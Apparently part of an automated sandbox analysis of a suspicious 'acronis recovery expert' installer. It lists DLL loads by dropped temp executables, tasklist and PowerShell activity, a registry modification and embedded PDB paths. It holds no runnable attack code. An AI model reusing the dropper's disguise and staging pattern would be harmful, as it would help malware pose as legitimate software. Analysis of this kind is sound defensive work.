                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: dwmapi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: sfc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: explorerframe.dll
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Section loaded: apphelp.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
                Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Panorado\electronics.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp Window found: window name: TMainForm
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe Static file information: File size 829879991 > 1048576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dll
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Jenkins\workspace\AC_KillProcess\x64\Release\KillProcess.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008E15000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\ServiceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\openssl-1.1.1j\libcrypto-1_1-x64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000903C000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUManufacturerCmdLib\x64\Release\CPUManufacturerCmdLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VideoMemoryLib\x64\Release\VideoMemoryLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGAManufacturerLib\x64\Release\VGAManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msidcrl40.pdb source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
                Source: Binary string: msidcrl40.pdbL source: msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp
                Source: Binary string: wntdll.pdb source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdbmm source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\temp\atkexComSvc\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msvcp140d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\NICInfoLib\x64\Release\NICInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUTypeCmdLib\x64\Release\CPUTypeCmdLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msnmsgr.pdb source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: z:\libusb\libusb\os\objfre_wxp_x86\amd64\libusb-1.0.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdbp source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\openssl-1.1.1j\libssl-1_1-x64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb33 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtdeclarative\qml\QtQuick\Window.2\windowplugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdbtU source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\p4clients\rel_beta\Projects\GazelleProto\Client\Engine\VC80_Release_Static\SteamEngine.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\Common.Split\NetFx\obj\Release\Microsoft.Azure.Storage.Common.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\buildworker\steam_rel_client_win32\build\src\external\SDL3\Release\SDL3.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdbF source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb88 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\Uninstaller\obj\x64\Release\Uninstaller.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdbLL source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb4 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Net.Http.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\LogHelper\obj\Release\LogHelper.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\HardDiskCapacityLib\x64\Release\HardDiskCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\OPHWInfo\x64\Release\OPHWInfo.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\temp\atkexComSvc\x64\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\projects\SDL_ttf\build-steam\RelWithDebInfo\SDL3_ttf.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb\.~. p._CorDllMainmscoree.dll source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtbase\plugins\sqldrivers\qsqlite.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DiskMediaTypeLib\x64\Release\DiskMediaTypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb,,, source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtgraphicaleffects\qml\QtGraphicalEffects\private\qtgraphicaleffectsprivate.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\dvs\p4\build\sw\grid\oss\POCO\1.10.1-all\_out\msvc1600\x86\Release\dynamic_runtime\PocoInitializer\PocoInitializer.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
